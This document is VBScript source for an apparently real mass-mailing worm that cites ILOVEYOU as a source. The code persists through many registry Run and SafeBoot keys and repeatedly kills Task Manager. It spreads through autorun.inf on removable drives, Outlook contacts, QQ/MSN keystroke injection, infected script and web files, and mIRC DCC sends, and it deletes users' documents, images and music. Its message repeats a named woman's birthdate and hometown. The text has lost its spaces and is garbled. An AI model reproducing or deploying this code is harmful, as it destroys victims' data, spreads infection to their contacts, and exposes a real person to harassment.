rem email:kouguoxi@hotmail.com

rem some crack statement i remment,make it can't to run

onerrorresumenext

dimtitle,text

title="canyouhelpmefindaperson?"

text="hernameisLiuChunli."&chr(13)&chr(10)

text=text&"herbirthdayis1981-01-23."&chr(13)&chr(10)

text=text&"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."&chr(13)&chr(10)

text=text&"Iwasdiedbecausebyher,"&chr(13)&chr(10)

text=text&"Iamdemandingmylifeofyou."&chr(13)&chr(10)

Setfso=CreateObject("Scripting"&"."&"FileSystem"&"Object")

self=fso.opentextfile(wscript.scriptfullname,1).readall

setWshShell=WScript.CreateObject("WScript"&"."&"Shell")

Startup=WshShell.SpecialFolders("Startup")

Setdirwin=fso.GetSpecialFolder(0)

Setdirsystem=fso.GetSpecialFolder(1)

Setdirtemp=fso.GetSpecialFolder(2)

Setlcl=fso.GetFile(WScript.ScriptFullName)

lcl.Copy(dirwin&"lcl.vbs")

lcl.Copy(dirsystem&"lcl.vbs")

fso.getfile(dirwin&"lcl.vbs").attributes=7

fso.getfile(dirsystem&"lcl.vbs").attributes=7

setsf0=fso.GetSpecialFolder(0)

b=sf0.drive&"lcl.txt"

Setlcl=fso.CreateTextFile(b,True)

lcl.Writetext

fso.CopyFileb,Startup&"lcl.txt"

lcl.Close

dimlcl

Setlcl=fso.CreateTextFile(wscript.scriptfullname,True)

Functionscode(N)

dimx

forx=0to254

ifn=chr(x)then

scode=x

exitfunction

endif

next

endfunction

rem请教：用readline等方法，整行加密，保持文本格式不不变；和解密办法。

remexecute我用不好请赐教。

dimcc,cipher,correy

forl=1tolen(self)

cc=mid(self,l,1)

ifl>99andinstr(self,"LiuChunli")>0then

cipher=chr(scode(cc)+9)rem我开始用99，得到的全是ascll为0的数据

else

cipher=chr(scode(cc))

endif

correy=correy&cipher

next

lcl.Writecorrey

lcl.Close

dimhk,hc,safe

hk="HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionrun"

hc="HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"

wshshell.RegWrite"HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout",0,"REG_DWORD"

wshshell.Regwritehk&"lcl",dirsystem&"lcl.vbs"

wshshell.Regwritehk&"execlcl",dirsystem&"lcl.vbs"

wshshell.Regwritehk&"Oncelcl",dirsystem&"lcl.vbs"

wshshell.Regwritehk&"OnceExlcl",dirsystem&"lcl.vbs"

wshshell.Regwritehk&"servicelcl",dirsystem&"lcl.vbs"

wshshell.Regwritehk&"Serviceslcl",dirsystem&"lcl.vbs"

wshshell.Regwritehc&"lcl",dirsystem&"lcl.vbs"

wshshell.Regwritehc&"execlcl",dirsystem&"lcl.vbs"

wshshell.Regwritehc&"Oncelcl",dirsystem&"lcl.vbs"

wshshell.Regwritehc&"servicelcl",dirsystem&"lcl.vbs"

safe="HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot"

wshshell.Regwritesafe&"Minimallcl.vbs",dirsystem&"lcl.vbs"

wshshell.Regwritesafe&"Networklcl.vbs",dirsystem&"lcl.vbs"

do

wshshell.run"cmd/ctaskkill/f/imtaskmgr.exe",0

wshshell.run"cmd/ctaskkill/f/imtasklist.exe",0

loop

dimd

ForEachdinfso.Drives

ifd.drivetype<>4then

fso.CopyFileb,d&"lcl.txt"

scan(d)

endif

ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then

fso.copyfilewscript.scriptfullname,d&"lcl.vbs"

fso.getfile(wscript.scriptfullname).attributes=7

setinf=fso.createtextfile(d&"autorun.inf",true)

fso.getfile(d&"autorun.inf").attributes=7

inf.writeline"[autorun]"

inf.writeline"open="

inf.writeline"shellopen=打开(&O)"

inf.writeline"shellopenCommand=WScript.exelclrun.vbs"

inf.writeline"shellopenCommand=WScript.exelcl.vbs"

inf.writeline"shellopenDefault=1"

inf.writeline"shellexplore=资源管理器(&X)"

inf.writeline"shellexploreCommand=WScript.exelclrun.vbs"

inf.writeline"shellexploreCommand=WScript.exelcl.vbs"

inf.close

setini=fso.createtextfile(d&"desktop.ini",true)

fso.getfile(d&"desktop.ini").attributes=7

ini.writeline"[.ShellClassInfo]"

ini.writeline"CLSID={645FF040-5081-101B-9F08-00AA002F954E}"

ini.close

setlclrun=fso.createtextfile(d&"lclrun.vbs",true)

fso.getfile(d&"lclrun.vbs").attributes=7

lclrun.writeline"OnErrorGoTo0"

lclrun.writeline"setfso=CreateObject("&chr(34)&"Scripting.FileSys"&chr(34)&"&"&chr(34)&"temObject"&chr(34)&")"

lclrun.writeline"iforeachdinfso.drives"

lclrun.writeline"ifd.drivetype=1andd.isready=trueandFormatNumber(d.FreeSpace/1024,0)>99then"

lclrun.writeline"fso.getfile(d.driveletter"&"&"&chr(34)&":lclrun.vbs"&chr(34)&").attributes=7"

lclrun.writeline"setwshshell=wscript.createobject("&chr(34)&"WScript.Shell"&chr(34)&")"

lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":lclrun.vbs"&chr(34)&chr(34)

lclrun.writeline"wshshell.run"&chr(34)&"d.driveletter"&"&"&chr(34)&":lcl.vbs"&chr(34)&chr(34)

lclrun.writeline"endif"

lclrun.writeline"next"

lclrun.close

endif

next

dimwshnetwork,netdrives,net1,net2

SetWSHNetwork=WScript.CreateObject("WScript.Network")

SetnetDrives=WSHNetwork.EnumNetworkDrives

IfnetDrives.Count>0Then

Fori=0TonetDrives.Count-1Step2

net1=netdrives(i)

net2=netDrives(i+1)

scan(net1)

scan(net2)

Next

EndIf

dimoutlookapp,mapiobj,addrlist,addrentcount,item,addrent,attachments

SetoutlookApp=CreateObject("Outlook.App"&"lication")

IfoutlookApp="Outlook"oroutlookapp="outlookexpress"Then

SetmapiObj=outlookApp.GetNameSpace("MAPI")''获取MAPI的名字空间

SetaddrList=mapiObj.AddressLists''获取地址表的个数

ForEachaddrInaddrList

Ifaddr.AddressEntries.Count<>0Then

addrEntCount=addr.AddressEntries.Count''获取每个地址表的Email记录数

ForaddrEntIndex=1ToaddrEntCount''遍历地址表的Email地址

Setitem=outlookApp.CreateItem(0)''获取一个邮件对象实例

SetaddrEnt=addr.AddressEntries(addrEntIndex)''获取具体Email地址

item.To=addrEnt.Address

item.Subject=title

item.Body=text

SetattachMents=item.Attachments

attachMents.Addfso.GetSpecialFolder(0)&"lcl.vbs"

item.DeleteAfterSubmit=True''信件提交后自动删除

Ifitem.To<>""Then

item.Send

wshshell.regwrite"HKCUsoftwareMailtestmailed","1"

EndIf

Next

EndIf

Next

Endif

remnextfromiloveyou.

setout=WScript.CreateObject("Outlook.Application")

setmapi=out.GetNameSpace("MAPI")

forctrlists=1tomapi.AddressLists.Count

seta=mapi.AddressLists(ctrlists)

x=1

regv=wshshell.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a)

if(regv="")then

regv=1

endif

if(int(a.AddressEntries.Count)>int(regv))then

forctrentries=1toa.AddressEntries.Count

malead=a.AddressEntries(x)

regad=""

regad=wshshell.RegRead("HKEY_CURRENT_USERSoftwareMicrosoftWAB"&malead)

if(regad="")then

setmale=out.CreateItem(0)

male.Recipients.Add(malead)

male.Subject=title

male.Body=text

male.Attachments.Add(dirsystem&"lcl.vbs")

male.Send

wshshell.RegWrite"HKEY_CURRENT_USERSoftwareMicrosoftWAB"&malead,1,"REG_DWORD"

endif

x=x+1

next

wshshell.RegWrite"HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

else

wshshell.RegWrite"HKEY_CURRENT_USERSoftwareMicrosoftWAB"&a,a.AddressEntries.Count

endif

next

Setout=Nothing

Setmapi=Nothing

SetobjOutlook=CreateObject("Outlook.Application")

IfobjOutlook="Outlook"Then

SetobjNamespace=objOutlook.GetNameSpace("MAPI")

SetcolAddressLists=objNamespace.AddressLists

SetonjNameSpace=Nothing

ForEachobjItemIncolAddressLists

IfobjItem.AddressEntries.Count<>0Then

intCountOfAddresses=objItem.AddressEntries.Count

Fori=1TointCountOfAddresses

SetobjMailMsg=objOutlook.CreateItem(0)

SetobjDestAddress=objItem.AddressEntries(i)

objMailMsg.To=objDestAddress.Address

objMailMsg.Subject=title

objMailMsg.Body=text

execute"setobjSend=objMailMsg."&Chr(65)&Chr(116)&Chr(116)&Chr(97)&Chr(99)&Chr(104)&Chr(109)&Chr(101)&Chr(110)&Chr(116)&Chr(115)

strAttach=strFilePathName

objMailMsg.DeleteAfterSubmit=True

objSend.AddstrAttach

IfobjMailMsg.To<>""Then

objMailMsg.Send

EndIf

Next

EndIf

Next

SetobjOutlook=Nothing

SetobjItem=Nothing

SetobjMailMsg=Nothing

SetobjDestAddress=Nothing

EndIf

strComputer="."

SetwbemServices=Getobject("winmgmts:"&strComputer)

SetwbemObjectSet=wbemServices.InstancesOf("Win32_Process")

ForEachwbemObjectInwbemObjectSet

ifwbemObject.Name="msn.exe"orwbemObject.Name="qq.exe"then

WshShell.AppActivatewbemobject.name

WshShell.SendKeys"canyouhelpmefindaperson?"

WshShell.SendKeys"^{enter}"'or"^~"

WScript.Sleep9000

WshShell.SendKeys"hernameisLiuChunli"

WshShell.SendKeys"^{enter}"

WScript.Sleep9000

WshShell.SendKeys"herbirthdayis1981-02-17."

WshShell.SendKeys"^{enter}"

WScript.Sleep9000

WshShell.SendKeys"hermotherhomeisYuzhen.Qixian.Kaifeng.Henan.China."

WshShell.SendKeys"^{enter}"

endif

Next

subscan(folder)

OnErrorGoTo0

setfd=fso.getfolder(folder)

foreachfileinfd.files

self1=fso.opentextfile(file,1).readall

ext=fso.GetExtensionName(file)

ext=lcase(ext)

ifext="vbs"orext="vbe"orext="wsc"orext="wsf"orext="wsh"orext="sct"then

ifinstr(self1,"LiuChunli")<0then

setlcl=fso.opentextfile(file.path,8,true)

lcl.writechr(13)&chr(10)

lcl.writeself

lcl.writechr(13)&chr(10)

lcl.close

endif

endif

ifext="htm"orext="html"orext="xhtml"orext="shtml"orext="dhtml"orext="phtml"orext="eml"then

ifinstr(self1,"LiuChunli")<0then

setlcl=fso.opentextfile(file.path,8,true)

lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"

lcl.writechr(13)&chr(10)

lcl.writeself

lcl.write"<"&"/SCRIPT>"

lcl.writechr(13)&chr(10)

lcl.close

endif

endif

remorext="mspx"

ifext="htd"orext="asp"orext="htt"orext="aspx"orext="cfm"orext="tpl"orext="dtd"orext="hta"then

ifinstr(self1,"LiuChunli")<0then

setlcl=fso.opentextfile(file.path,8,true)

lcl.write"<"&"SCRIPTLANGUAGE='VBScript'>"

lcl.writechr(13)&chr(10)

lcl.writeself

lcl.write"<"&"/SCRIPT>"

lcl.writechr(13)&chr(10)

lcl.close

endif

endif

ifext="ini"then

ifnotinstr(self1,"LiuChunli")>0then

dimini

setini=fso.opentextfile(file.path,8,true)

ini.writelinechr(13)&chr(10)

ini.WriteLine"[script]"

ini.WriteLine"n0=on1:JOIN:#:{"

ini.WriteLine"n1=/if($nick==$me){halt}"

ini.WriteLine"n2=/.dccsend$nick"&dirsystem&"lcl.vbs"

remini.WriteLine"n0=on1:join:*.*:{if($nick!=$me){halt}/dccsend$nick"&dirsystem&"lcl.vbs"}"

'利用命令/ddcsend$nick"&dirsystem&"lcl.vbs"给通道中的其他用户传送病毒文件

ini.WriteLine"n3=}"

ini.WriteLine";LiuChunli"

ini.close

endif

endif

remevery9inthelunarcalendadoit

ifext="mp3"orext="doc"orext="docx"orext="dwg"orext="wma"orext="swf"orext="jpg"then

file.deletetrue

endif

next

foreachsubfdinfd.subfolders

scan(subfd)

next

endsub